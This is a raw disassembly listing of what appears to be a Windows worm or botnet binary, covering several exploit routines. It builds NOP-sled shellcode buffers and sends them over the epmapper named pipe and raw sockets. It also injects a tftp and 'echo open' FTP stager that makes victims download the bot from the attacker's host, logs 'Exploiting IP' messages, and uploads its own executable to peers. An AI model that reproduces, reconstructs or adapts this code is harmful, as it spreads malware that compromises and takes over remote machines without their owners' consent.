loc_414262: ; CODE XREF: sub_414199+BD�j
cmp eax, 5
jz short loc_414270
cmp eax, edi
jz short loc_414270
xor eax, eax
inc eax
jmp short loc_414272
; ---------------------------------------------------------------------------
loc_414270: ; CODE XREF: sub_414199+CC�j
; sub_414199+D0�j
xor eax, eax
loc_414272: ; CODE XREF: sub_414199+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_414199 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414277 proc near ; CODE XREF: .text:00414616�p
; .text:004146F6�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset aIpc ; "\\IPC$"
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_42BA98 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
mov ecx, 8Ah
lea edi, [ebp+var_34E]
rep stosd
push 45h
stosw
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+var_124], bl
lea edi, [ebp+var_123]
rep stosd
stosw
push 0FFh
stosb
lea eax, [ebp+var_124]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push ebx
push ebx
call dword_4220D4 ; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_418630
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_418630
add esp, 10h
jmp short loc_414311
; ---------------------------------------------------------------------------
loc_414306: ; CODE XREF: sub_414277+AB�j
push 7D0h
call dword_422000 ; Sleep
loc_414311: ; CODE XREF: sub_414277+8D�j
push ebx
lea eax, [ebp+var_354]
push ebx
push eax
call dword_43A350
test eax, eax
jnz short loc_414306
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_414277 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41432A proc near ; CODE XREF: .text:00414642�p
; .text:0041477D�p
var_3008 = byte ptr -3008h
var_2008 = byte ptr -2008h
var_1FE4 = dword ptr -1FE4h
var_1FD8 = byte ptr -1FD8h
var_1F31 = byte ptr -1F31h
var_1008 = byte ptr -1008h
var_1000 = dword ptr -1000h
var_FF8 = dword ptr -0FF8h
var_F88 = dword ptr -0F88h
var_F84 = dword ptr -0F84h
var_F54 = dword ptr -0F54h
var_F50 = dword ptr -0F50h
var_F38 = dword ptr -0F38h
var_E7C = dword ptr -0E7Ch
var_CA8 = dword ptr -0CA8h
var_CA0 = dword ptr -0CA0h
var_C98 = byte ptr -0C98h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_D0 = dword ptr 0D8h
arg_D4 = dword ptr 0DCh
arg_D8 = dword ptr 0E0h
push ebp
mov ebp, esp
mov eax, 3008h
call sub_416B90
push ebx
push offset byte_42FD4C
push [ebp+arg_0]
mov [ebp+var_8], 0A7h
call sub_408894
pop ecx
push eax
lea eax, [ebp+var_3008]
push 1000h
push eax
call sub_4120F4
mov ebx, eax
add esp, 10h
test ebx, ebx
mov [ebp+var_4], ebx
jz loc_414599
push esi
push edi
push 0Ch
pop ecx
mov esi, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
lea edi, [ebp+var_2008]
rep movsd
push 29h
pop ecx
mov eax, 90909090h
lea edi, [ebp+var_1FD8]
rep stosd
stosw
stosb
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_3008]
lea edi, [ebp+var_1F31]
rep movsd
mov ecx, eax
add ebx, 0D7h
jmp short loc_414404
; ---------------------------------------------------------------------------
loc_4143B3: ; CODE XREF: sub_41432A+EA�j
mov ebx, [ebp+var_8]
inc ebx
push 0Ch
pop ecx
mov esi, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
lea edi, [ebp+var_2008]
rep movsd
mov ecx, ebx
mov edx, ecx
shr ecx, 2
mov eax, 90909090h
lea edi, [ebp+var_1FD8]
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+var_4]
mov ecx, eax
mov edx, ecx
lea edi, [ebp+ebx+var_1FD8]
shr ecx, 2
lea esi, [ebp+var_3008]
mov [ebp+var_8], ebx
rep movsd
mov ecx, edx
lea ebx, [ebx+eax+30h]
loc_414404: ; CODE XREF: sub_41432A+87�j
and ecx, 3
mov eax, ebx
push 10h
rep movsb
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_4143B3
cmp [ebp+arg_D8], 0
jz short loc_414438
cmp [ebp+arg_D4], 3
jz short loc_414431
cmp [ebp+arg_D4], 0
jnz short loc_414446
loc_414431: ; CODE XREF: sub_41432A+FC�j
mov eax, dword_4308FC
jmp short loc_41444B
; ---------------------------------------------------------------------------
loc_414438: ; CODE XREF: sub_41432A+F3�j
cmp [ebp+arg_D4], 3
mov eax, dword_4308FC
jz short loc_41444B
loc_414446: ; CODE XREF: sub_41432A+105�j
mov eax, dword_4308F8
loc_41444B: ; CODE XREF: sub_41432A+10C�j
; sub_41432A+11A�j
mov [ebp+var_1FE4], eax
mov ecx, 0D8h
mov esi, offset dword_430430
lea edi, [ebp+var_1008]
rep movsd
mov esi, offset dword_430794
lea edi, [ebp+var_CA8]
movsd
movsd
movsd
movsd
mov ecx, ebx
mov eax, ecx
shr ecx, 2
lea esi, [ebp+var_2008]
lea edi, [ebp+var_C98]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Fh
pop ecx
lea eax, [ebx+370h]
lea edi, [ebp+eax+var_1008]
add eax, 3Ch
mov esi, offset off_4307A8
rep movsd
lea edi, [ebp+eax+var_1008]
push 0Ch
pop ecx
mov esi, offset dword_4307E8
rep movsd
lea esi, [eax+30h]
mov eax, ebx
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA8], eax
add [ebp+var_CA0], eax
mov eax, [ebp+var_1000]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_1000], eax
mov eax, [ebp+var_FF8]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_FF8], eax
mov eax, [ebp+var_F88]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F88], eax
mov eax, [ebp+var_F84]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F54]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F54], eax
mov eax, [ebp+var_F50]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F38]
lea eax, [eax+ebx-0Ch]
mov [ebp+var_F38], eax
mov eax, [ebp+var_E7C]
lea eax, [eax+ebx-0Ch]
lea edi, [esi+1]
push edi
mov [ebp+var_4], esi
mov [ebp+var_E7C], eax
call sub_416E1F
pop ecx
mov ecx, edi
mov ebx, ecx
mov edx, eax
shr ecx, 2
xor eax, eax
mov edi, edx
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
mov ecx, esi
lea esi, [ebp+var_1008]
mov edi, edx
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+arg_D0]
and ecx, 3
rep movsb
mov ecx, [ebp+var_4]
pop edi
mov [eax], ecx
mov eax, edx
pop esi
loc_414599: ; CODE XREF: sub_41432A+3F�j
pop ebx
leave
retn
sub_41432A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1338h
call sub_416B90
cmp dword ptr [ebp+0BCh], 1BDh
push ebx
push esi
push edi
jnz loc_41470A
lea eax, [ebp-34h]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_414199
test eax, eax
pop ecx
pop ecx
jz loc_414814
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-338h]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call sub_416975
add esp, 0Ch
xor ebx, ebx
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
lea eax, [ebp-338h]
push eax
call dword_422034 ; CreateFileA
mov [ebp-4], eax
cmp eax, 0FFFFFFFFh
lea eax, [ebp+0Ch]
jnz short loc_414621
loc_414615: ; CODE XREF: .text:004146C2�j
push eax
call sub_414277
pop ecx
jmp loc_414814
; ---------------------------------------------------------------------------
loc_414621: ; CODE XREF: .text:00414613�j
push 2
push eax
call sub_40402D
pop ecx
pop ecx
push 1
push eax
lea eax, [ebp-10h]
push eax
sub esp, 0D0h
push 34h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_41432A
add esp, 0DCh
cmp eax, ebx
mov [ebp-8], eax
jz short loc_4146B6
push 186A0h
call sub_416E1F
pop ecx
mov esi, eax
push ebx
xor eax, eax
mov ecx, 61A8h
mov edi, esi
rep stosd
lea eax, [ebp-0Ch]
push eax
mov edi, 2710h
push edi
push esi
push 48h
push offset dword_4303E0
push dword ptr [ebp-4]
call dword_422134 ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_4146A6
push ebx
lea eax, [ebp-14h]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-8]
push dword ptr [ebp-4]
call dword_422030 ; WriteFile
test eax, eax
jnz short loc_4146C7
loc_4146A6: ; CODE XREF: .text:0041468C�j
push esi
call sub_416D07
push dword ptr [ebp-8]
call sub_416D07
pop ecx
pop ecx
loc_4146B6: ; CODE XREF: .text:00414652�j
push dword ptr [ebp-4]
call dword_42202C ; CloseHandle
lea eax, [ebp+0Ch]
jmp loc_414615
; ---------------------------------------------------------------------------
loc_4146C7: ; CODE XREF: .text:004146A4�j
push ebx
lea eax, [ebp-0Ch]
push eax
push edi
push esi
push dword ptr [ebp-4]
call dword_42208C ; ReadFile
push dword ptr [ebp-8]
mov edi, eax
call sub_416D07
push esi
call sub_416D07
pop ecx
pop ecx
push dword ptr [ebp-4]
call dword_42202C ; CloseHandle
lea eax, [ebp+0Ch]
push eax
call sub_414277
cmp edi, 1
pop ecx
jnz loc_414828
jmp loc_414814
; ---------------------------------------------------------------------------
loc_41470A: ; CODE XREF: .text:004145B6�j
lea eax, [ebp+0Ch]
push 1
push eax
call sub_40402D
mov esi, eax
cmp esi, 1
pop ecx
pop ecx
jz loc_414814
xor ebx, ebx
push ebx
push 1
push 2
call dword_43A3BC ; socket
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_414814
push dword ptr [ebp+0BCh]
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-24h], 2
call dword_43A514 ; ntohs
mov [ebp-22h], ax
lea eax, [ebp+0Ch]
push eax
call dword_43A434 ; inet_addr
push ebx
push esi
mov [ebp-20h], eax
lea eax, [ebp-0Ch]
push eax
sub esp, 0D0h
push 34h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_41432A
mov esi, eax
add esp, 0DCh
cmp esi, ebx
mov [ebp-8], esi
jnz short loc_414796
push dword ptr [ebp-4]
jmp short loc_41480E
; ---------------------------------------------------------------------------
loc_414796: ; CODE XREF: .text:0041478F�j
mov edi, [ebp-4]
push 10h
lea eax, [ebp-24h]
push eax
push edi
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4147AE
loc_4147AB: ; CODE XREF: .text:004147C0�j
push esi
jmp short loc_414807
; ---------------------------------------------------------------------------
loc_4147AE: ; CODE XREF: .text:004147A9�j
push ebx
push 48h
push offset dword_4303E0
push edi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4147AB
push ebx
mov esi, 1000h
push esi
lea eax, [ebp-1338h]
push eax
push edi
call dword_43A324 ; recv
push ebx
push dword ptr [ebp-0Ch]
push dword ptr [ebp-8]
push edi
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4147EF
push dword ptr [ebp-8]
jmp short loc_414807
; ---------------------------------------------------------------------------
loc_4147EF: ; CODE XREF: .text:004147E8�j
push ebx
push esi
lea eax, [ebp-1338h]
push eax
push edi
call dword_43A324 ; recv
cmp eax, 0FFFFFFFFh
push dword ptr [ebp-8]
jnz short loc_41481B
loc_414807: ; CODE XREF: .text:004147AC�j
; .text:004147ED�j
call sub_416D07
pop ecx
push edi
loc_41480E: ; CODE XREF: .text:00414794�j
call dword_43A4D0 ; closesocket
loc_414814: ; CODE XREF: .text:004145CD�j
; .text:0041461C�j ...
xor eax, eax
jmp loc_4148D3
; ---------------------------------------------------------------------------
loc_41481B: ; CODE XREF: .text:00414805�j
call sub_416D07
pop ecx
push edi
call dword_43A4D0 ; closesocket
loc_414828: ; CODE XREF: .text:004146FF�j
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-234h]
push offset aTftpFileTran_1 ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_416975
add esp, 0Ch
xor esi, esi
loc_414842: ; CODE XREF: .text:00414862�j
lea eax, [ebp-234h]
push eax
call sub_401FEF
test eax, eax
pop ecx
jnz short loc_414866
push 1388h
call dword_422000 ; Sleep
inc esi
cmp esi, 6
jl short loc_414842
jmp short loc_4148D0
; ---------------------------------------------------------------------------
loc_414866: ; CODE XREF: .text:00414851�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0C4h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
lea eax, [ebp-234h]
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
push eax
call sub_416975
add esp, 10h
cmp [ebp+0D0h], ebx
jnz short loc_4148B2
push ebx
push dword ptr [ebp+0CCh]
lea eax, [ebp-234h]
push eax
lea eax, [ebp+30h]
push eax
push dword ptr [ebp+8]
call sub_405D62
add esp, 14h
loc_4148B2: ; CODE XREF: .text:00414893�j
lea eax, [ebp-234h]
push eax
call sub_401F0F
mov eax, [ebp+0C4h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
pop ecx
loc_4148D0: ; CODE XREF: .text:00414864�j
xor eax, eax
inc eax
loc_4148D3: ; CODE XREF: .text:00414816�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 4210h
call sub_416B90
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push 1
push eax
call sub_40402D
test eax, eax
pop ecx
pop ecx
jz loc_414A4E
cmp eax, 1
jz loc_414A4E
push 0
push 1
push 2
call dword_43A3BC ; socket
mov ebx, eax
xor eax, eax
cmp ebx, 0FFFFFFFFh
jz loc_414A50
push dword ptr [ebp+0BCh]
lea edi, [ebp-10h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-10h], 2
call dword_43A514 ; ntohs
mov [ebp-0Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_43A434 ; inet_addr
push offset byte_42FD4C
push dword ptr [ebp+8]
mov [ebp-0Ch], eax
call sub_408894
pop ecx
push eax
mov esi, 1000h
lea eax, [ebp-2210h]
push esi
push eax
call sub_4120F4
add esp, 10h
test eax, eax
jz loc_414A4E
push 122h
push offset loc_430900
lea eax, [ebp-4210h]
push esi
push eax
call sub_411FED
mov eax, 12Eh
add [ebp-0EB0h], eax
add [ebp-0EA8h], eax
mov eax, 250h
add [ebp-1208h], eax
add [ebp-1200h], eax
add [ebp-1190h], eax
add [ebp-118Ch], eax
add [ebp-115Ch], eax
add [ebp-1158h], eax
add [ebp-1140h], eax
add [ebp-1084h], eax
add esp, 10h
push 10h
lea eax, [ebp-10h]
push eax
push ebx
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4149EA
loc_4149E7: ; CODE XREF: .text:004149FE�j
; .text:00414A17�j ...
push ebx
jmp short loc_414A48
; ---------------------------------------------------------------------------
loc_4149EA: ; CODE XREF: .text:004149E5�j
xor edi, edi
push edi
push 48h
push offset dword_430A28
push ebx
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4149E7
push edi
push esi
lea eax, [ebp-3210h]
push eax
push ebx
call dword_43A324 ; recv
cmp byte ptr [ebp-320Eh], 0Ch
jnz short loc_4149E7
push edi
push edi
lea eax, [ebp-1210h]
push eax
push ebx
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jz short loc_4149E7
push edi
push esi
lea eax, [ebp-3210h]
push eax
push ebx
call dword_43A324 ; recv
cmp byte ptr [ebp-320Eh], 3
push ebx
jnz short loc_414A55
loc_414A48: ; CODE XREF: .text:004149E8�j
call dword_43A4D0 ; closesocket
loc_414A4E: ; CODE XREF: .text:004148F7�j
; .text:00414900�j ...
xor eax, eax
loc_414A50: ; CODE XREF: .text:00414919�j
; .text:00414B06�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_414A55: ; CODE XREF: .text:00414A46�j
call dword_43A4D0 ; closesocket
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-210h]
push offset aTftpFileTran_1 ; "[TFTP]: File transfer complete to IP: %"...
push eax
call sub_416975
add esp, 0Ch
xor esi, esi
loc_414A75: ; CODE XREF: .text:00414A95�j
lea eax, [ebp-210h]
push eax
call sub_401FEF
test eax, eax
pop ecx
jnz short loc_414A99
push 1388h
call dword_422000 ; Sleep
inc esi
cmp esi, 6
jl short loc_414A75
jmp short loc_414B03
; ---------------------------------------------------------------------------
loc_414A99: ; CODE XREF: .text:00414A84�j
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0C4h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
lea eax, [ebp-210h]
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
push eax
call sub_416975
add esp, 10h
cmp [ebp+0D0h], edi
jnz short loc_414AE5
push edi
push dword ptr [ebp+0CCh]
lea eax, [ebp-210h]
push eax
lea eax, [ebp+30h]
push eax
push dword ptr [ebp+8]
call sub_405D62
add esp, 14h
loc_414AE5: ; CODE XREF: .text:00414AC6�j
lea eax, [ebp-210h]
push eax
call sub_401F0F
mov eax, [ebp+0C4h]
imul eax, 3Ch
lea eax, dword_42E070[eax]
inc dword ptr [eax]
pop ecx
loc_414B03: ; CODE XREF: .text:00414A97�j
xor eax, eax
inc eax
jmp loc_414A50
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 3D4h
and dword ptr [ebp-10h], 0
push ebx
push esi
push edi
mov esi, offset dword_42BB80
lea edi, [ebp-24h]
movsd
movsd
movsd
movsd
push 15Bh
movsw
mov dword ptr [ebp-44h], 6741A1CDh
mov dword ptr [ebp-40h], 6741A199h
mov dword ptr [ebp-3Ch], 6741A426h
mov dword ptr [ebp-38h], 67419E1Dh
mov dword ptr [ebp-34h], 67419CE8h
mov dword ptr [ebp-30h], 0FFB7DE9h
mov dword ptr [ebp-2Ch], 0FFB832Fh
call sub_416E1F
pop ecx
mov edi, eax
mov [ebp-4], edi
push 56h
xor eax, eax
pop ecx
rep stosd
stosw
stosb
mov ecx, [ebp-4]
mov edi, ecx
lea esi, [ebp-24h]
movsd
movsd
movsd
movsd
add ecx, 11h
movsw
mov edi, ecx
mov [ebp-28h], ecx
dec edi
loc_414B8B: ; CODE XREF: .text:00414B91�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_414B8B
mov esi, offset loc_42BB7C
movsw
movsb
mov edi, ecx
dec edi
loc_414B9E: ; CODE XREF: .text:00414BA4�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_414B9E
mov esi, offset aNilsisgay ; "NILSISGAY!!"
movsd
push 6
movsd
push 1
push 2
movsd
call dword_43A3BC ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_414DE5
and dword ptr [ebp-8], 0
lea esi, [ebp-44h]
mov [ebp-0Ch], esi
loc_414BCF: ; CODE XREF: .text:00414D73�j
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_43A434 ; inet_addr
push dword ptr [ebp+0BCh]
mov [ebp-20h], eax
call dword_43A514 ; ntohs
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jz loc_414D5F
mov edi, [ebp-28h]
not dword ptr [esi]
push 4
push esi
push edi
call sub_416840
mov eax, offset loc_42E370
add esp, 0Ch
mov ecx, eax
loc_414C29: ; CODE XREF: .text:00414C2E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_414C29
sub eax, ecx
mov esi, ecx
dec edi
loc_414C35: ; CODE XREF: .text:00414C3B�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_414C35
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-4]
rep movsb
lea ecx, [eax+1]
loc_414C51: ; CODE XREF: .text:00414C56�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_414C51
push 0
sub eax, ecx
push eax
lea eax, [ebp-4]
push eax
push ebx
call dword_43A458 ; send
test eax, eax
jz loc_414D5C
mov esi, dword_422000
push 3E8h
call esi ; Sleep
push ebx
call dword_43A4D0 ; closesocket
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_43A434 ; inet_addr
push 7BDh
mov [ebp-20h], eax
call dword_43A514 ; ntohs
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_43A36C ; connect
test eax, eax
jz loc_414D5C
mov eax, offset byte_42FD4C
push eax
push eax
push dword ptr [ebp+8]
call sub_408894
pop ecx
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
mov edi, 190h
lea eax, [ebp-1D4h]
push edi
push eax
call sub_416BCD
add esp, 18h
push dword_439F04
push dword ptr [ebp+8]
call sub_408894
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-1D4h]
push edi
push eax
call sub_416BCD
add esp, 14h
push 0
add edi, 70h
push edi
lea eax, [ebp-3D4h]
push eax
push dword ptr [ebp+8]
call dword_43A324 ; recv
test eax, eax
jle short loc_414D5C
push 1F4h
call esi ; Sleep
lea eax, [ebp-1D4h]
lea edx, [eax+1]
loc_414D3E: ; CODE XREF: .text:00414D43�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414D3E
push 0
sub eax, edx
push eax
lea eax, [ebp-1D4h]
push eax
push ebx
call dword_43A458 ; send
test eax, eax
jg short loc_414D7B
loc_414D5C: ; CODE XREF: .text:00414C6A�j
; .text:00414CBE�j ...
mov esi, [ebp-0Ch]
loc_414D5F: ; CODE XREF: .text:00414C0B�j
push ebx
call dword_43A4D0 ; closesocket
inc dword ptr [ebp-8]
add esi, 4
cmp dword ptr [ebp-8], 7
mov [ebp-0Ch], esi
jb loc_414BCF
jmp short loc_414DE5
; ---------------------------------------------------------------------------
loc_414D7B: ; CODE XREF: .text:00414D5A�j
push ebx
call dword_43A4D0 ; closesocket
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0C4h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-3D4h]
push edi
push eax
mov dword ptr [ebp-10h], 1
call sub_416BCD
add esp, 14h
cmp dword ptr [ebp+0D0h], 0
jnz short loc_414DD8
push 0
push dword ptr [ebp+0CCh]
lea eax, [ebp-3D4h]
push eax
lea eax, [ebp+30h]
push eax
push dword ptr [ebp+8]
call sub_405D62
add esp, 14h
loc_414DD8: ; CODE XREF: .text:00414DB8�j
lea eax, [ebp-3D4h]
push eax
call sub_401F0F
pop ecx
loc_414DE5: ; CODE XREF: .text:00414BBF�j
; .text:00414D79�j
mov eax, [ebp-10h]
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414DED proc near ; CODE XREF: .text:00414F33�p
; .text:00414FD3�p ...
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
lea eax, [ebp+var_8]
push eax
push esi
push esi
lea eax, [ebp+var_10C]
push eax
push esi
mov [ebp+var_8], 1Eh
mov [ebp+var_4], esi
mov [ebp+var_108], ebx
mov [ebp+var_10C], 1
call dword_43A468 ; select
test eax, eax
jg short loc_414E3B
push ebx
call dword_43A4D0 ; closesocket
loc_414E36: ; CODE XREF: sub_414DED+71�j
or eax, 0FFFFFFFFh
jmp short loc_414E72
; ---------------------------------------------------------------------------
loc_414E3B: ; CODE XREF: sub_414DED+40�j
push edi
push esi
mov edx, offset dword_480D78
push 400h
push edx
xor eax, eax
mov edi, edx
mov ecx, 100h
push ebx
rep stosd
call dword_43A324 ; recv
cmp eax, 1
pop edi
jl short loc_414E36
mov ecx, off_4310DC
xor eax, eax
cmp dword ptr [ecx], 52525245h
setnz al
dec eax
loc_414E72: ; CODE XREF: sub_414DED+4C�j
pop esi
pop ebx
leave
retn
sub_414DED endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 740h
push ebx
xor eax, eax
push esi
push edi
lea edi, [ebp-2Ch]
stosd
stosd
stosd
stosw
stosb
xor eax, eax
lea edi, [ebp-18h]
stosd
xor ebx, ebx
mov [ebp-1Ch], ebx
stosb
call dword_422004 ; GetTickCount
push eax
call sub_416B24
pop ecx
xor esi, esi
loc_414EA8: ; CODE XREF: .text:00414EBE�j
call sub_416B31
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [ebp+esi-18h], dl
inc esi
cmp esi, 4
jl short loc_414EA8
lea eax, [ebp-18h]
push eax
lea eax, [ebp-2Ch]
push offset dword_42BB94
push eax
mov [ebp+esi-17h], bl
call sub_416975
add esp, 0Ch
push ebx
push 1
push 2
call dword_43A3BC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp-4], esi
jz loc_4150CB
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-3Ch], 2
call dword_43A434 ; inet_addr
push dword ptr [ebp+0BCh]
mov [ebp-38h], eax
call dword_43A514 ; ntohs
mov [ebp-3Ah], ax
push 10h
lea eax, [ebp-3Ch]
push eax
push esi
call dword_43A36C ; connect
lea eax, [ebp-1Ch]
push eax
push 8004667Eh
push esi
call dword_43A354 ; ioctlsocket
push esi
call sub_414DED
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_4150C2
xor eax, eax
mov esi, offset dword_480D78
mov ecx, 100h
mov edi, esi
rep stosd
push 104h
lea eax, [ebp-140h]
push eax
push ebx
call dword_422010 ; GetModuleFileNameA
push ebx
push ebx
push 3
push ebx
push 1
push 80000000h
lea eax, [ebp-140h]
push eax
call dword_422034 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp-10h], eax
jz loc_4150C2
push ebx
push eax
call dword_422094 ; GetFileSize
mov ecx, off_4310DC
mov dword ptr [ecx], 46445055h
mov ecx, off_4310DC
mov [ecx+4], eax
mov edi, off_4310DC
mov [ebp-8], eax
lea eax, [ebp-2Ch]
add edi, 8
loc_414FB6: ; CODE XREF: .text:00414FBE�j
mov cl, [eax]
inc eax
mov [edi], cl
inc edi
cmp cl, bl
jnz short loc_414FB6
push ebx
push 400h
push esi
push dword ptr [ebp-4]
call dword_43A458 ; send
push dword ptr [ebp-4]
call sub_414DED
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_4150C2
cmp [ebp-8], ebx
jz short loc_415063
loc_414FE7: ; CODE XREF: .text:00415061�j
xor eax, eax
cmp dword ptr [ebp-8], 400h
mov ecx, 100h
lea edi, [ebp-740h]
mov dword ptr [ebp-0Ch], 400h
rep stosd
jnb short loc_41500C
mov eax, [ebp-8]
mov [ebp-0Ch], eax
loc_41500C: ; CODE XREF: .text:00415004�j
mov eax, [ebp-8]
push 2
push ebx
neg eax
push eax
push dword ptr [ebp-10h]
call dword_422090 ; SetFilePointer
push ebx
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-0Ch]
lea eax, [ebp-740h]
push eax
push dword ptr [ebp-10h]
call dword_42208C ; ReadFile
push ebx
push dword ptr [ebp-0Ch]
lea eax, [ebp-740h]
push eax
push dword ptr [ebp-4]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_41505E
call dword_43A47C ; WSAGetLastError
cmp eax, 2733h
jnz short loc_415063
xor eax, eax
loc_41505E: ; CODE XREF: .text:0041504D�j
sub [ebp-8], eax
jnz short loc_414FE7
loc_415063: ; CODE XREF: .text:00414FE5�j
; .text:0041505A�j
push dword ptr [ebp-4]
call sub_414DED
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4150C2
push dword ptr [ebp-10h]
call dword_42202C ; CloseHandle
xor eax, eax
mov ecx, 100h
mov edi, esi
rep stosd
mov eax, off_4310DC
mov dword ptr [eax], 464E5552h
lea eax, [ebp-2Ch]
push eax
mov eax, off_4310DC
add eax, 4
push eax
call sub_416975
pop ecx
pop ecx
push ebx
push 400h
push esi
push dword ptr [ebp-4]
call dword_43A458 ; send
push dword ptr [ebp-4]
call sub_414DED
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4150D2
loc_4150C2: ; CODE XREF: .text:00414F3C�j
; .text:00414F84�j ...
push dword ptr [ebp-4]
call dword_43A4D0 ; closesocket
loc_4150CB: ; CODE XREF: .text:00414EEC�j
xor eax, eax
jmp loc_415170
; ---------------------------------------------------------------------------
loc_4150D2: ; CODE XREF: .text:004150C0�j
push ebx
push 4
xor eax, eax
mov ecx, 100h
mov edi, esi
